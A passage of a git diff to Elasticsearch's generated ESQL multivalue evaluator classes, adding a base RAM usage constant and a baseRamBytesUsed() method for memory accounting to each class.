RamUsageEstimator.shallowSizeOfInstance(MvAppendIntEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator field1; @@ -47,6 +50,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += field1.baseRamBytesUsed(); + baseRamBytesUsed += field2.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public IntBlock eval(int positionCount, IntBlock field1Block, IntBlock field2Block) { try(IntBlock.Builder result = driverContext.blockFactory().newIntBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvAppendLongEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvAppendLongEvaluator.java index c23d036550fc8..6913eead04224 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvAppendLongEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvAppendLongEvaluator.java @@ -6,6 +6,7 @@ import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.LongBlock; import org.elasticsearch.compute.data.Page; @@ -20,6 +21,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class MvAppendLongEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(MvAppendLongEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator field1; @@ -47,6 +50,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += field1.baseRamBytesUsed(); + baseRamBytesUsed += field2.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public LongBlock eval(int positionCount, LongBlock field1Block, LongBlock field2Block) { try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvAvgDoubleEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvAvgDoubleEvaluator.java index b0a99ab33320d..7bde59981be88 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvAvgDoubleEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvAvgDoubleEvaluator.java @@ -6,6 +6,7 @@ import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.DoubleVector; @@ -18,6 +19,8 @@ * This class is generated. Edit {@code MvEvaluatorImplementer} instead. */ public final class MvAvgDoubleEvaluator extends AbstractMultivalueFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(MvAvgDoubleEvaluator.class); + public MvAvgDoubleEvaluator(EvalOperator.ExpressionEvaluator field, DriverContext driverContext) { super(driverContext, field); } @@ -79,6 +82,11 @@ public Block evalNotNullable(Block fieldVal) { } } + @Override + public long baseRamBytesUsed() { + return BASE_RAM_BYTES_USED + field.baseRamBytesUsed(); + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final EvalOperator.ExpressionEvaluator.Factory field; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvAvgIntEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvAvgIntEvaluator.java index abc2157d30d03..cc866d986258c 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvAvgIntEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvAvgIntEvaluator.java @@ -6,6 +6,7 @@ import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.DoubleVector; @@ -19,6 +20,8 @@ * This class is generated. Edit {@code MvEvaluatorImplementer} instead. */ public final class MvAvgIntEvaluator extends AbstractMultivalueFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(MvAvgIntEvaluator.class); + public MvAvgIntEvaluator(EvalOperator.ExpressionEvaluator field, DriverContext driverContext) { super(driverContext, field); } @@ -138,6 +141,11 @@ public Block evalSingleValuedNotNullable(Block fieldVal) { } } + @Override + public long baseRamBytesUsed() { + return BASE_RAM_BYTES_USED + field.baseRamBytesUsed(); + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final EvalOperator.ExpressionEvaluator.Factory field; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvAvgLongEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvAvgLongEvaluator.java index b323f92b3b02f..c24a5cbf80a49 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvAvgLongEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvAvgLongEvaluator.java @@ -6,6 +6,7 @@ import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.DoubleVector; @@ -19,6 +20,8 @@ * This class is generated. Edit {@code MvEvaluatorImplementer} instead. */ public final class MvAvgLongEvaluator extends AbstractMultivalueFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(MvAvgLongEvaluator.class); + public MvAvgLongEvaluator(EvalOperator.ExpressionEvaluator field, DriverContext driverContext) { super(driverContext, field); } @@ -138,6 +141,11 @@ public Block evalSingleValuedNotNullable(Block fieldVal) { } } + @Override + public long baseRamBytesUsed() { + return BASE_RAM_BYTES_USED + field.baseRamBytesUsed(); + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final EvalOperator.ExpressionEvaluator.Factory field; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvAvgUnsignedLongEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvAvgUnsignedLongEvaluator.java index f12634f721c94..f24cc64b2f2d6 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvAvgUnsignedLongEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvAvgUnsignedLongEvaluator.java @@ -6,6 +6,7 @@ import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.DoubleVector; @@ -19,6 +20,8 @@ * This class is generated. Edit {@code MvEvaluatorImplementer} instead. */ public final class MvAvgUnsignedLongEvaluator extends AbstractMultivalueFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(MvAvgUnsignedLongEvaluator.class); + public MvAvgUnsignedLongEvaluator(EvalOperator.ExpressionEvaluator field, DriverContext driverContext) { super(driverContext, field); @@ -139,6 +142,11 @@ public Block evalSingleValuedNotNullable(Block fieldVal) { } } + @Override + public long baseRamBytesUsed() { + return BASE_RAM_BYTES_USED + field.baseRamBytesUsed(); + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final EvalOperator.ExpressionEvaluator.Factory field; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvFirstBooleanEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvFirstBooleanEvaluator.java index 72cc92114d9a5..0898dabd42c71 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvFirstBooleanEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvFirstBooleanEvaluator.java @@ -6,6 +6,7 @@ import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BooleanVector; @@ -17,6 +18,8 @@ * This class is generated. Edit {@code MvEvaluatorImplementer} instead. */ public final class MvFirstBooleanEvaluator extends AbstractMultivalueFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(MvFirstBooleanEvaluator.class); + public MvFirstBooleanEvaluator(EvalOperator.ExpressionEvaluator field, DriverContext driverContext) { super(driverContext, field); @@ -69,6 +72,11 @@ public Block evalNotNullable(Block fieldVal) { } } + @Override + public long baseRamBytesUsed() { + return BASE_RAM_BYTES_USED + field.baseRamBytesUsed(); + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final EvalOperator.ExpressionEvaluator.Factory field; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvFirstBytesRefEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvFirstBytesRefEvaluator.java index d0bcfda7a4209..bfeba5f9bc1b3 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvFirstBytesRefEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvFirstBytesRefEvaluator.java @@ -7,6 +7,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -18,6 +19,8 @@ * This class is generated. Edit {@code MvEvaluatorImplementer} instead. */ public final class MvFirstBytesRefEvaluator extends AbstractMultivalueFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(MvFirstBytesRefEvaluator.class); + public MvFirstBytesRefEvaluator(EvalOperator.ExpressionEvaluator field, DriverContext driverContext) { super(driverContext, field); @@ -72,6 +75,11 @@ public Block evalNotNullable(Block fieldVal) { } } + @Override + public long baseRamBytesUsed() { + return BASE_RAM_BYTES_USED + field.baseRamBytesUsed(); + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final EvalOperator.ExpressionEvaluator.Factory field; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvFirstDoubleEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvFirstDoubleEvaluator.java index d38ec51990ac0..6c1d1c1d1a9d8 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvFirstDoubleEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvFirstDoubleEvaluator.java @@ -6,6 +6,7 @@ import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.DoubleVector; @@ -17,6 +18,8 @@ * This class is generated. Edit {@code MvEvaluatorImplementer} instead. */ public final class MvFirstDoubleEvaluator extends AbstractMultivalueFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(MvFirstDoubleEvaluator.class); + public MvFirstDoubleEvaluator(EvalOperator.ExpressionEvaluator field, DriverContext driverContext) { super(driverContext, field); @@ -69,6 +72,11 @@ public Block evalNotNullable(Block fieldVal) { } } + @Override + public long baseRamBytesUsed() { + return BASE_RAM_BYTES_USED + field.baseRamBytesUsed(); + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final EvalOperator.ExpressionEvaluator.Factory field; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvFirstIntEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvFirstIntEvaluator.java index 7cb6e53326b7a..27877b6b83ff3 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvFirstIntEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvFirstIntEvaluator.java @@ -6,6 +6,7 @@ import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.IntBlock; import org.elasticsearch.compute.data.IntVector; @@ -17,6 +18,8 @@ * This class is generated. Edit {@code MvEvaluatorImplementer} instead. */ public final class MvFirstIntEvaluator extends AbstractMultivalueFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(MvFirstIntEvaluator.class); + public MvFirstIntEvaluator(EvalOperator.ExpressionEvaluator field, DriverContext driverContext) { super(driverContext, field); } @@ -68,6 +71,11 @@ public Block evalNotNullable(Block fieldVal) { } } + @Override + public long baseRamBytesUsed() { + return BASE_RAM_BYTES_USED + field.baseRamBytesUsed(); + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final EvalOperator.ExpressionEvaluator.Factory field; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvFirstLongEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvFirstLongEvaluator.java index 3a34c55940248..da3e55b1592cf 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvFirstLongEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvFirstLongEvaluator.java @@ -6,6 +6,7 @@ import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.LongBlock; import org.elasticsearch.compute.data.LongVector; @@ -17,6 +18,8 @@ * This class is generated. Edit {@code MvEvaluatorImplementer} instead. */ public final class MvFirstLongEvaluator extends AbstractMultivalueFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(MvFirstLongEvaluator.class); + public MvFirstLongEvaluator(EvalOperator.ExpressionEvaluator field, DriverContext driverContext) { super(driverContext, field); } @@ -68,6 +71,11 @@ public Block evalNotNullable(Block fieldVal) { } } + @Override + public long baseRamBytesUsed() { + return BASE_RAM_BYTES_USED + field.baseRamBytesUsed(); + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final EvalOperator.ExpressionEvaluator.Factory field; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvLastBooleanEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvLastBooleanEvaluator.java index 08022d6580ebf..440c31b2d0fdd 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvLastBooleanEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvLastBooleanEvaluator.java @@ -6,6 +6,7 @@ import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BooleanVector; @@ -17,6 +18,8 @@ * This class is generated. Edit {@code MvEvaluatorImplementer} instead. */ public final class MvLastBooleanEvaluator extends AbstractMultivalueFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(MvLastBooleanEvaluator.class); + public MvLastBooleanEvaluator(EvalOperator.ExpressionEvaluator field, DriverContext driverContext) { super(driverContext, field); @@ -69,6 +72,11 @@ public Block evalNotNullable(Block fieldVal) { } } + @Override + public long baseRamBytesUsed() { + return BASE_RAM_BYTES_USED + field.baseRamBytesUsed(); + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final EvalOperator.ExpressionEvaluator.Factory field; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvLastBytesRefEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvLastBytesRefEvaluator.java index 29c5e19aee827..8c85491c80e66 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvLastBytesRefEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvLastBytesRefEvaluator.java @@ -7,6 +7,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -18,6 +19,8 @@ * This class is generated. Edit {@code MvEvaluatorImplementer} instead. */ public final class MvLastBytesRefEvaluator extends AbstractMultivalueFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(MvLastBytesRefEvaluator.class); + public MvLastBytesRefEvaluator(EvalOperator.ExpressionEvaluator field, DriverContext driverContext) { super(driverContext, field); @@ -72,6 +75,11 @@ public Block evalNotNullable(Block fieldVal) { } } + @Override + public long baseRamBytesUsed() { + return BASE_RAM_BYTES_USED + field.baseRamBytesUsed(); + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final EvalOperator.ExpressionEvaluator.Factory field; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvLastDoubleEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvLastDoubleEvaluator.java index b4f5c8d147f03..4c493543a2725 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvLastDoubleEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvLastDoubleEvaluator.java @@ -6,6 +6,7 @@ import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.DoubleVector; @@ -17,6 +18,8 @@ * This class is generated. Edit {@code MvEvaluatorImplementer} instead. */ public final class MvLastDoubleEvaluator extends AbstractMultivalueFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(MvLastDoubleEvaluator.class); + public MvLastDoubleEvaluator(EvalOperator.ExpressionEvaluator field, DriverContext driverContext) { super(driverContext, field); @@ -69,6 +72,11 @@ public Block evalNotNullable(Block fieldVal) { } } + @Override + public long baseRamBytesUsed() { + return BASE_RAM_BYTES_USED + field.baseRamBytesUsed(); + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final EvalOperator.ExpressionEvaluator.Factory field; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvLastIntEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvLastIntEvaluator.java index d43e11571102f..3c5a58b9db96e 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvLastIntEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvLastIntEvaluator.java @@ -6,6 +6,7 @@ import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.IntBlock; import org.elasticsearch.compute.data.IntVector; @@ -17,6 +18,8 @@ * This class is generated. Edit {@code MvEvaluatorImplementer} instead. */ public final class MvLastIntEvaluator extends AbstractMultivalueFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(MvLastIntEvaluator.class); + public MvLastIntEvaluator(EvalOperator.ExpressionEvaluator field, DriverContext driverContext) { super(driverContext, field); } @@ -68,6 +71,11 @@ public Block evalNotNullable(Block fieldVal) { } } + @Override + public long baseRamBytesUsed() { + return BASE_RAM_BYTES_USED + field.baseRamBytesUsed(); + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final EvalOperator.ExpressionEvaluator.Factory field; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvLastLongEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvLastLongEvaluator.java index 897f7e513aebb..990bf7db24f9b 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvLastLongEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvLastLongEvaluator.java @@ -6,6 +6,7 @@ import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.LongBlock; import org.elasticsearch.compute.data.LongVector; @@ -17,6 +18,8 @@ * This class is generated. Edit {@code MvEvaluatorImplementer} instead. */ public final class MvLastLongEvaluator extends AbstractMultivalueFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(MvLastLongEvaluator.class); + public MvLastLongEvaluator(EvalOperator.ExpressionEvaluator field, DriverContext driverContext) { super(driverContext, field); } @@ -68,6 +71,11 @@ public Block evalNotNullable(Block fieldVal) { } } + @Override + public long baseRamBytesUsed() { + return BASE_RAM_BYTES_USED + field.baseRamBytesUsed(); + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final EvalOperator.ExpressionEvaluator.Factory field; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMaxBooleanEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMaxBooleanEvaluator.java index 2b7decc4c5537..598525507fa11 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMaxBooleanEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMaxBooleanEvaluator.java @@ -6,6 +6,7 @@ import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BooleanVector; @@ -17,6 +18,8 @@ * This class is generated. Edit {@code MvEvaluatorImplementer} instead. */ public final class MvMaxBooleanEvaluator extends AbstractMultivalueFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(MvMaxBooleanEvaluator.class); + public MvMaxBooleanEvaluator(EvalOperator.ExpressionEvaluator field, DriverContext driverContext) { super(driverContext, field); @@ -125,6 +128,11 @@ private Block evalAscendingNotNullable(Block fieldVal) { } } + @Override + public long baseRamBytesUsed() { + return BASE_RAM_BYTES_USED + field.baseRamBytesUsed(); + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final EvalOperator.ExpressionEvaluator.Factory field; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMaxBytesRefEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMaxBytesRefEvaluator.java index ed90337cb1947..41c5958836b94 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMaxBytesRefEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMaxBytesRefEvaluator.java @@ -7,6 +7,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -18,6 +19,8 @@ * This class is generated. Edit {@code MvEvaluatorImplementer} instead. */ public final class MvMaxBytesRefEvaluator extends AbstractMultivalueFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(MvMaxBytesRefEvaluator.class); + public MvMaxBytesRefEvaluator(EvalOperator.ExpressionEvaluator field, DriverContext driverContext) { super(driverContext, field); @@ -134,6 +137,11 @@ private Block evalAscendingNotNullable(Block fieldVal) { } } + @Override + public long baseRamBytesUsed() { + return BASE_RAM_BYTES_USED + field.baseRamBytesUsed(); + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final EvalOperator.ExpressionEvaluator.Factory field; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMaxDoubleEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMaxDoubleEvaluator.java index 9fcce8e6c6538..bfab8ec5f970e 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMaxDoubleEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMaxDoubleEvaluator.java @@ -6,6 +6,7 @@ import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.DoubleVector; @@ -17,6 +18,8 @@ * This class is generated. Edit {@code MvEvaluatorImplementer} instead. */ public final class MvMaxDoubleEvaluator extends AbstractMultivalueFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(MvMaxDoubleEvaluator.class); + public MvMaxDoubleEvaluator(EvalOperator.ExpressionEvaluator field, DriverContext driverContext) { super(driverContext, field); } @@ -124,6 +127,11 @@ private Block evalAscendingNotNullable(Block fieldVal) { } } + @Override + public long baseRamBytesUsed() { + return BASE_RAM_BYTES_USED + field.baseRamBytesUsed(); + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final EvalOperator.ExpressionEvaluator.Factory field; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMaxIntEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMaxIntEvaluator.java index 5b03f65e27374..946aac9f5d10c 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMaxIntEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMaxIntEvaluator.java @@ -6,6 +6,7 @@ import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.IntBlock; import org.elasticsearch.compute.data.IntVector; @@ -17,6 +18,8 @@ * This class is generated. Edit {@code MvEvaluatorImplementer} instead. */ public final class MvMaxIntEvaluator extends AbstractMultivalueFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(MvMaxIntEvaluator.class); + public MvMaxIntEvaluator(EvalOperator.ExpressionEvaluator field, DriverContext driverContext) { super(driverContext, field); } @@ -124,6 +127,11 @@ private Block evalAscendingNotNullable(Block fieldVal) { } } + @Override + public long baseRamBytesUsed() { + return BASE_RAM_BYTES_USED + field.baseRamBytesUsed(); + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final 